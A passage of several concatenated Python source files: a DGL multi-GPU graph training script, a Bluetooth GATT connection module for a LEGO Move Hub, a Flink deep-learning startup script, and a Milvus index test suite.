print(f"Started processing {path.split('/')[-1]}")
pipeline.preprocess_file(path)
print(f"Finished processing {path.split('/')[-1]}")
else:
pass
def main(args):
langs = [args.src, args.tgt]
to_join = []
# loads the pipelines
pipelines = _load_pipelines(args.config, args.src, args.tgt)
for lang in langs:
# Creates and spawns a process to parallelise the preprocess
p = Process(target=_process, args=(lang, pipelines,))
p.start()
to_join.append(p)
# Waits for all the processes to finish
for p in to_join:
p.join()
if __name__ == "__main__":
parser = _get_parser()
args = parser.parse_args()
os.chdir(os.path.dirname(os.path.realpath(args.config)))
main(args)
|
train_sampling_multi_gpu.py
|
import dgl
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import dgl.multiprocessing as mp
import dgl.nn.pytorch as dglnn
import time
import math
import argparse
from torch.nn.parallel import DistributedDataParallel
import tqdm
from model import SAGE
from load_graph import load_reddit, inductive_split
def compute_acc(pred, labels):
"""
Compute the accuracy of prediction given the labels.
"""
return (th.argmax(pred, dim=1) == labels).float().sum() / len(pred)
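# Illustrative example, not part of the original script: compute_acc() compares the arg-max
# class of each prediction row against the integer labels. The function name and tensors
# below are hypothetical.
def _compute_acc_example():
    pred = th.tensor([[0.9, 0.1], [0.2, 0.8], [0.6, 0.4]])  # 3 nodes, 2 classes
    labels = th.tensor([0, 1, 1])
    acc = compute_acc(pred, labels)  # 2 of the 3 predictions are correct
    assert abs(acc.item() - 2 / 3) < 1e-6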
def evaluate(model, g, nfeat, labels, val_nid, device):
"""
Evaluate the model on the validation set specified by ``val_nid``.
g : The entire graph.
inputs : The features of all the nodes.
labels : The labels of all the nodes.
    val_nid : A node ID tensor indicating which nodes we actually compute the accuracy for.
device : The GPU device to evaluate on.
"""
model.eval()
with th.no_grad():
pred = model.inference(g, nfeat, device, args.batch_size, args.num_workers)
model.train()
return compute_acc(pred[val_nid], labels[val_nid])
def load_subtensor(nfeat, labels, seeds, input_nodes, dev_id):
"""
Extracts features and labels for a subset of nodes.
"""
batch_inputs = nfeat[input_nodes].to(dev_id)
batch_labels = labels[seeds].to(dev_id)
return batch_inputs, batch_labels
#### Entry point
def run(proc_id, n_gpus, args, devices, data):
# Start up distributed training, if enabled.
dev_id = devices[proc_id]
if n_gpus > 1:
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
master_ip='127.0.0.1', master_port='12345')
world_size = n_gpus
th.distributed.init_process_group(backend="nccl",
init_method=dist_init_method,
world_size=world_size,
rank=proc_id)
th.cuda.set_device(dev_id)
# Unpack data
n_classes, train_g, val_g, test_g = data
if args.inductive:
train_nfeat = train_g.ndata.pop('features')
val_nfeat = val_g.ndata.pop('features')
test_nfeat = test_g.ndata.pop('features')
train_labels = train_g.ndata.pop('labels')
val_labels = val_g.ndata.pop('labels')
test_labels = test_g.ndata.pop('labels')
else:
train_nfeat = val_nfeat = test_nfeat = g.ndata.pop('features')
train_labels = val_labels = test_labels = g.ndata.pop('labels')
if not args.data_cpu:
train_nfeat = train_nfeat.to(dev_id)
train_labels = train_labels.to(dev_id)
in_feats = train_nfeat.shape[1]
train_mask = train_g.ndata['train_mask']
val_mask = val_g.ndata['val_mask']
test_mask = ~(test_g.ndata['train_mask'] | test_g.ndata['val_mask'])
train_nid = train_mask.nonzero().squeeze()
val_nid = val_mask.nonzero().squeeze()
test_nid = test_mask.nonzero().squeeze()
train_nid = train_nid[:n_gpus * args.batch_size + 1]
# Create PyTorch DataLoader for constructing blocks
sampler = dgl.dataloading.MultiLayerNeighborSampler(
[int(fanout) for fanout in args.fan_out.split(',')])
dataloader = dgl.dataloading.NodeDataLoader(
train_g,
train_nid,
sampler,
use_ddp=n_gpus > 1,
batch_size=args.batch_size,
shuffle=True,
drop_last=False,
num_workers=args.num_workers)
# Define model and optimizer
model = SAGE(in_feats, args.num_hidden, n_classes, args.num_layers, F.relu, args.dropout)
model = model.to(dev_id)
if n_gpus > 1:
model = DistributedDataParallel(model, device_ids=[dev_id], output_device=dev_id)
loss_fcn = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=args.lr)
# Training loop
avg = 0
iter_tput = []
for epoch in range(args.num_epochs):
if n_gpus > 1:
dataloader.set_epoch(epoch)
tic = time.time()
# Loop over the dataloader to sample the computation dependency graph as a list of
# blocks.
for step, (input_nodes, seeds, blocks) in enumerate(dataloader):
if proc_id == 0:
tic_step = time.time()
# Load the input features as well as output labels
batch_inputs, batch_labels = load_subtensor(train_nfeat, train_labels,
seeds, input_nodes, dev_id)
blocks = [block.int().to(dev_id) for block in blocks]
# Compute loss and prediction
batch_pred = model(blocks, batch_inputs)
loss = loss_fcn(batch_pred, batch_labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if proc_id == 0:
iter_tput.append(len(seeds) * n_gpus / (time.time() - tic_step))
if step % args.log_every == 0 and proc_id == 0:
acc = compute_acc(batch_pred, batch_labels)
print('Epoch {:05d} | Step {:05d} | Loss {:.4f} | Train Acc {:.4f} | Speed (samples/sec) {:.4f} | GPU {:.1f} MB'.format(
epoch, step, loss.item(), acc.item(), np.mean(iter_tput[3:]), th.cuda.max_memory_allocated() / 1000000))
if n_gpus > 1:
th.distributed.barrier()
toc = time.time()
if proc_id == 0:
print('Epoch Time(s): {:.4f}'.format(toc - tic))
if epoch >= 5:
avg += toc - tic
if epoch % args.eval_every == 0 and epoch != 0:
if n_gpus == 1:
eval_acc = evaluate(
model, val_g, val_nfeat, val_labels, val_nid, devices[0])
test_acc = evaluate(
model, test_g, test_nfeat, test_labels, test_nid, devices[0])
else:
eval_acc = evaluate(
model.module, val_g, val_nfeat, val_labels, val_nid, devices[0])
test_acc = evaluate(
model.module, test_g, test_nfeat, test_labels, test_nid, devices[0])
print('Eval Acc {:.4f}'.format(eval_acc))
print('Test Acc: {:.4f}'.format(test_acc))
if n_gpus > 1:
th.distributed.barrier()
if proc_id == 0:
print('Avg epoch time: {}'.format(avg / (epoch - 4)))
if __name__ == '__main__':
argparser = argparse.ArgumentParser("multi-gpu training")
argparser.add_argument('--gpu', type=str, default='0',
help="Comma separated list of GPU device IDs.")
argparser.add_argument('--num-epochs', type=int, default=20)
argparser.add_argument('--num-hidden', type=int, default=16)
argparser.add_argument('--num-layers', type=int, default=2)
argparser.add_argument('--fan-out', type=str, default='10,25')
argparser.add_argument('--batch-size', type=int, default=1000)
argparser.add_argument('--log-every', type=int, default=20)
argparser.add_argument('--eval-every', type=int, default=5)
argparser.add_argument('--lr', type=float, default=0.003)
argparser.add_argument('--dropout', type=float, default=0.5)
argparser.add_argument('--num-workers', type=int, default=0,
help="Number of sampling processes. Use 0 for no extra process.")
argparser.add_argument('--inductive', action='store_true',
help="Inductive learning setting")
argparser.add_argument('--data-cpu', action='store_true',
help="By default the script puts all node features and labels "
"on GPU when using it to save time for data copy. This may "
"be undesired if they cannot fit in GPU memory at once. "
"This flag disables that.")
args = argparser.parse_args()
devices = list(map(int, args.gpu.split(',')))
n_gpus = len(devices)
g, n_classes = load_reddit()
# Construct graph
g = dgl.as_heterograph(g)
if args.inductive:
train_g, val_g, test_g = inductive_split(g)
else:
train_g = val_g = test_g = g
# Create csr/coo/csc formats before launching training processes with multi-gpu.
    # This avoids creating certain formats in each sub-process, which saves memory and CPU.
train_g.create_formats_()
val_g.create_formats_()
test_g.create_formats_()
# Pack data
data = n_classes, train_g, val_g, test_g
if n_gpus == 1:
run(0, n_gpus, args, devices, data)
else:
procs = []
for proc_id in range(n_gpus):
p = mp.Process(target=run, args=(proc_id, n_gpus, args, devices, data))
p.start()
procs.append(p)
for p in procs:
p.join()
|
cgatt.py
|
import logging
import re
import threading
from time import sleep
import gatt
from pylgbst.comms import Connection, LEGO_MOVE_HUB, MOVE_HUB_HW_UUID_SERV, MOVE_HUB_HW_UUID_CHAR, \
MOVE_HUB_HARDWARE_HANDLE
from pylgbst.utilities import str2hex
log = logging.getLogger('comms-gatt')
class CustomDevice(gatt.Device, object):
def __init__(self, mac_address, manager):
gatt.Device.__init__(self, mac_address=mac_address, manager=manager)
self._notify_callback = lambda hnd, val: None
self._handle = None
def connect(self):
gatt.Device.connect(self)
log.info("Waiting for device connection...")
while self._handle is None:
log.debug("Sleeping...")
sleep(1)
if isinstance(self._handle, BaseException):
exc = self._handle
self._handle = None
raise exc
def write(self, data):
log.debug("Writing to handle: %s", str2hex(data))
return self._handle.write_value(data)
def enable_notifications(self):
log.debug('Enable Notifications...')
self._handle.enable_notifications()
def set_notific_handler(self, func_hnd):
self._notify_callback = func_hnd
def services_resolved(self):
log.debug('Getting MoveHub services and characteristics...')
gatt.Device.services_resolved(self)
log.debug("[%s] Resolved services", self.mac_address)
for service in self.services:
log.debug("[%s] Service [%s]", self.mac_address, service.uuid)
for characteristic in service.characteristics:
log.debug("[%s] Characteristic [%s]", self.mac_address, characteristic.uuid)
if service.uuid == MOVE_HUB_HW_UUID_SERV and characteristic.uuid == MOVE_HUB_HW_UUID_CHAR:
log.debug('MoveHub characteristic found')
self._handle = characteristic
if self._handle is None:
self.manager.stop()
self._handle = RuntimeError("Failed to obtain MoveHub handle")
def characteristic_value_updated(self, characteristic, value):
value = self._fix_weird_bug(value)
log.debug('Notification in GattDevice: %s', str2hex(value))
self._notify_callback(MOVE_HUB_HARDWARE_HANDLE, value)
def _fix_weird_bug(self, value):
if isinstance(value, str) and "dbus.Array" in value: # weird bug from gatt on my Ubuntu 16.04!
log.debug("Fixing broken notify string: %s", value)
return ''.join([chr(int(x.group(1))) for x in re.finditer(r"dbus.Byte\((\d+)\)", value)])
return value
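# Illustrative example, not part of the original module: the workaround above turns a
# textual "dbus.Byte(...)" notification into the raw byte string it represents. The sample
# input and function name are hypothetical.
def _fix_weird_bug_example():
    broken = "dbus.Array([dbus.Byte(5), dbus.Byte(0), dbus.Byte(130)], signature='y')"
    fixed = ''.join(chr(int(m.group(1))) for m in re.finditer(r"dbus.Byte\((\d+)\)", broken))
    assert [ord(c) for c in fixed] == [5, 0, 130]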
class GattConnection(Connection):
"""
:type _device: CustomDevice
"""
def __init__(self, bt_iface_name='hci0'):
super(GattConnection, self).__init__()
self._device = None
self._iface = bt_iface_name
try:
self._manager = gatt.DeviceManager(adapter_name=self._iface)
except TypeError:
raise NotImplementedError("Gatt is not implemented for this platform")
self._manager_thread = threading.Thread(target=self._manager.run)
self._manager_thread.setDaemon(True)
log.debug('Starting DeviceManager...')
def connect(self, hub_mac=None):
self._manager_thread.start()
self._manager.start_discovery()
while not self._device:
log.info("Discovering devices...")
devices = self._manager.devices()
log.debug("Devices: %s", devices)
for dev in devices:
address = dev.mac_address
name = dev.alias()
if (not hub_mac and name == LEGO_MOVE_HUB) or hub_mac == address:
logging.info("Found %s at %s", name, address)
self._device = CustomDevice(address, self._manager)
break
if not self._device:
sleep(1)
self._device.connect()
return self
def disconnect(self):
self._manager.stop()
self._device.disconnect()
def write(self, handle, data):
self._device.write(data)
def set_notify_handler(self, handler):
self._device.set_notific_handler(handler)
def enable_notifications(self):
self._device.enable_notifications()
def is_alive(self):
        return self._manager_thread.is_alive()
|
startup.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
import importlib
import threading
import ctypes
import logging
import traceback
from dl_on_flink_framework import context
import grpc
from dl_on_flink_framework import node_pb2
from dl_on_flink_framework import node_service_pb2_grpc
def parse_dir_script(script_path):
index = str(script_path).rindex('/')
dir_str = script_path[0: index + 1]
script_name = script_path[index + 1: len(script_path) - 3]
return dir_str, script_name
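# Illustrative example, not part of the original script: parse_dir_script() splits an
# absolute script path into its directory (kept with the trailing slash) and the module
# name with the ".py" suffix dropped. The sample path is hypothetical.
def _parse_dir_script_example():
    dir_str, script_name = parse_dir_script("/opt/flink/jobs/train_model.py")
    assert dir_str == "/opt/flink/jobs/"
    assert script_name == "train_model"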
def start_user_func(function, ml_context):
try:
function(ml_context)
except Exception as e:
logging.error(traceback.format_exc())
raise
def start_user_thread(function, ml_context):
local_t = threading.Thread(target=start_user_func, args=(function, ml_context,), name="user_thread")
local_t.setDaemon(True)
local_t.start()
return local_t
def terminate_thread(thread):
"""Terminates a python thread from another thread.
:param thread: a threading.Thread instance
"""
    if not thread.is_alive():
return
exc = ctypes.py_object(SystemExit)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(
ctypes.c_long(thread.ident), exc)
if res == 0:
raise ValueError("nonexistent thread id")
elif res > 1:
# """if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"""
ctypes.pythonapi.PyThreadState_SetAsyncExc(thread.ident, None)
raise SystemError("PyThreadState_SetAsyncExc failed")
thread.join()
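# Note on terminate_thread: PyThreadState_SetAsyncExc only schedules the
# SystemExit; it is raised the next time the target thread executes Python
# bytecode, so a thread blocked inside a long C call may not stop right away.
# Typical use here would be terminating the thread returned by
# start_user_thread() if the framework has to shut the user code down early.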
def createContext(node_address):
channel = grpc.insecure_channel(node_address)
stub = node_service_pb2_grpc.NodeServiceStub(channel)
response = stub.GetContext(node_pb2.ContextRequest(message=''))
context_proto = response.context
return context.Context(context_proto, channel)
if __name__ == "__main__":
assert len(sys.argv) == 2, 'Invalid cmd line argument ' + str(sys.argv)
print ('Running user func in process mode')
sys.stdout.flush()
address = sys.argv[1]
context = createContext(address)
# setup default logging
logging.basicConfig(level=logging.INFO,
format='%(asctime)s [' + context.identity + '-python-%(filename)s:%(lineno)d] %(levelname)s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
)
print ("########## " + context.userScript)
script_str = context.userScript
key = context.identity
func_name = context.funcName
dir_name = parse_dir_script(script_str)
sys.path.insert(0, dir_name[0])
user_py = importlib.import_module(dir_name[1])
func = getattr(user_py, func_name)
logging.info(key + ' calling user func ' + func_name)
func(context)
logging.info(key + " python run finish")
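# For reference, the user script imported above only needs to expose a function
# that takes the Context object; the function name comes from context.funcName.
# A minimal sketch (module and function names are illustrative only):
#
#     # user_job.py
#     def map_func(context):
#         # `context` is the dl_on_flink Context built by createContext();
#         # read job properties from it and run the user's training logic here.
#         pass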
|
test_index.py
|
import pytest
from base.client_base import TestcaseBase
from base.index_wrapper import ApiIndexWrapper
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from common.code_mapping import CollectionErrorMessage as clem
from common.code_mapping import IndexErrorMessage as iem
from utils.utils import *
from common.constants import *
prefix = "index"
default_schema = cf.gen_default_collection_schema()
default_field_name = ct.default_float_vec_field_name
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
# copied from pymilvus
uid = "test_index"
BUILD_TIMEOUT = 300
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
# query = gen_search_vectors_params(field_name, default_entities, default_top_k, 1)
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
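# For reference, default_index_params above corresponds roughly to a raw
# pymilvus call of the following shape (the collection object is a placeholder):
#
#     collection.create_index(default_field_name,
#                             {"index_type": "IVF_SQ8", "metric_type": "L2",
#                              "params": {"nlist": 64}})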
class TestIndexParams(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("collection", [None, "coll"])
def test_index_non_collection(self, collection):
"""
target: test index with None collection
method: input none collection object
expected: raise exception
"""
self._connect()
self.index_wrap.init_index(collection, default_field_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: clem.CollectionType})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("field_name", ct.get_invalid_strs)
def test_index_field_name_invalid(self, field_name):
"""
target: test index with error field name
method: input field name
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
log.error(iem.WrongFieldName % str(field_name))
self.index_wrap.init_index(collection_w.collection, field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: iem.WrongFieldName % str(field_name)})
@pytest.mark.tags(CaseLabel.L1)
def test_index_field_name_not_existed(self):
"""
target: test index with error field name
method: input field name not created
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
f_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, f_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: f"cannot create index on non-existed field: {f_name}"})
@pytest.mark.tags(CaseLabel.L0)
# TODO (reason="pymilvus issue #677", raises=TypeError)
@pytest.mark.parametrize("index_type", ct.get_invalid_strs)
def test_index_type_invalid(self, index_type):
"""
target: test index with error index type
method: input invalid index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = index_type
if not isinstance(index_params["index_type"], str):
msg = "must be str"
else:
msg = "Invalid index_type"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: msg})
@pytest.mark.tags(CaseLabel.L1)
def test_index_type_not_supported(self):
"""
target: test index with error index type
method: input unsupported index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = "IVFFFFFFF"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_invalid(self, get_invalid_index_params):
"""
target: test index with error index params
method: input invalid index params
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = get_invalid_index_params
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_invalid(self, get_invalid_index_name):
"""
target: test index with error index name
method: input invalid index name
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
class TestIndexOperation(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
def test_index_create_with_different_indexes(self):
"""
target: test create index on one field, with two different type of index
method: create two different indexes
expected: only latest index can be created for a collection
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index)
assert len(collection_w.indexes) == 1
assert collection_w.indexes[0].params["index_type"] == default_index["index_type"]
@pytest.mark.tags(CaseLabel.L1)
def test_index_collection_empty(self):
"""
target: test index with empty collection
method: Index on empty collection
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("index_param", [default_index_params])
def test_index_params(self, index_param):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index_params = index_param
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_flush(self):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
self._connect().flush([collection_w.name])
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
assert collection_w.num_entities == ct.default_nb
# TODO: not support
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_dup(self):
"""
target: test index with duplicate index name
        method: create index with an existing index name created by `collection.create_index`
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
index_name = ct.default_index_name
collection_w = self.init_collection_wrap(name=c_name)
collection_w.collection.create_index(default_field_name, default_index_params, index_name=index_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names(self):
"""
target: test index on one field, with two indexes
method: create index with two different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields(self):
"""
target: test index on two fields, with the same name
method: create the same index name with two different fields
expected: exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields_B(self):
"""
target: test index on two fields, with the different name
method: create the different index with two different fields
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_eq_maximum(self):
"""
        target: test index on one field, with different names, where the number of names equals the maximum supported
method: create the different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_more_maximum(self):
"""
        target: test index on one field, with different names, where the number of names exceeds the maximum supported
method: create the different indexes
expected: exception raised
"""
pass
    @pytest.mark.tags(CaseLabel.L1)
def test_index_drop_index(self):
"""
target: test index.drop
method: create index by `index`, and then drop it
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
cf.assert_equal_index(index, collection_w.collection.indexes[0])
self.index_wrap.drop()
assert len(collection_w.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L1)
# TODO #7372
def test_index_drop_repeatedly(self):
"""
target: test index.drop
method: create index by `index`, and then drop it twice
expected: exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
_, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
self.index_wrap.drop()
self.index_wrap.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Index doesn't exist"})
class TestIndexAdvanced(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L2)
def test_index_drop_multi_collections(self):
"""
target: test index.drop
method: create indexes by `index`, and then drop it, assert there is one index left
        expected: only the dropped index is removed; the other collection's index remains
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
cw2 = self.init_collection_wrap(name=c_name_2)
iw_2 = ApiIndexWrapper()
self.index_wrap.init_index(cw.collection, default_field_name, default_index_params)
index_2, _ = iw_2.init_index(cw2.collection, default_field_name, default_index_params)
self.index_wrap.drop()
assert cf.assert_equal_index(index_2, cw2.collection.indexes[0])
assert len(cw.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_inserting(self):
"""
target: test index.drop during inserting
method: create indexes by `index`, and then drop it during inserting entities, make sure async insert
expected: no exception raised, insert success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_searching(self):
"""
target: test index.drop during searching
method: create indexes by `index`, and then drop it during searching, make sure async search
expected: no exception raised, search success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_recovery_after_restart(self):
"""
target: test index still existed after server restart
method: create index by `index`, and then restart server, assert index existed
expected: index in collection.indexes
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_building_after_restart(self):
"""
target: index can still build if not finished before server restart
method: create index by `index`, and then restart server, assert server is indexing
expected: index build finished after server restart
"""
pass
"""
******************************************************************
The following classes are copied from pymilvus test
******************************************************************
"""
class TestIndexBase:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.skip(reason="Repeat with test_index_field_name_not_existed")
def test_create_index_on_field_not_existed(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index on field not existed
expected: error raised
"""
tmp_field_name = gen_unique_str()
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_on_field(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index on other field
expected: error raised
"""
tmp_field_name = "int64"
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_without_connect(self, dis_connect, collection):
"""
target: test create index without connection
method: create collection and add entities in it, check if added successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.create_index(collection, field_name, default_index)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, collection, get_simple_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
logging.getLogger().info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
params, _ = gen_search_vectors_params(field_name, default_entities, default_top_k, nq,
search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **params)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread(self, connect, collection, args):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
"""
connect.insert(collection, default_entities)
def build(connect):
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_collection_not_existed(self, connect):
"""
target: test create index interface when collection name not existed
method: create collection and add entities in it, create index,
